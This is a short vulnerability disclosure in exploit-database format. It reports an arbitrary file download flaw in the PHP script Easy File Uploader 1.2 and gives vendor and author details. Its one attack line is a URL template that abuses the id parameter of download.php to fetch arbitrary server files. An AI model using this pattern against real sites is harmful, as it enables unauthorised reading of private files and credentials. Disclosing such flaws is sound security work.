id: 26920
date: 02/07/2017
title: Easy File Uploader 1.2 - Arbitrary File Download Vulnerability
author: Ihsan Sencan
cves: 

# # # # # 
# Exploit Title: Easy File Uploader Script v1.2 - Arbitrary File Download
# Google Dork: N/A
# Date: 07.02.2017
# Vendor Homepage: http://nelliwinne.net/
# Software Buy: https://codecanyon.net/item/easy-file-uploader-php-multiple-uploader-with-file-manager/17222287
# Demo: http://demos.nelliwinne.net/EasyFileUploader/
# Version: 1.2
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# Exploit :
# http://localhost/[PATH]/download.php?id=[FILE]
# # # # #

#  0day.today [2023-03-25]  #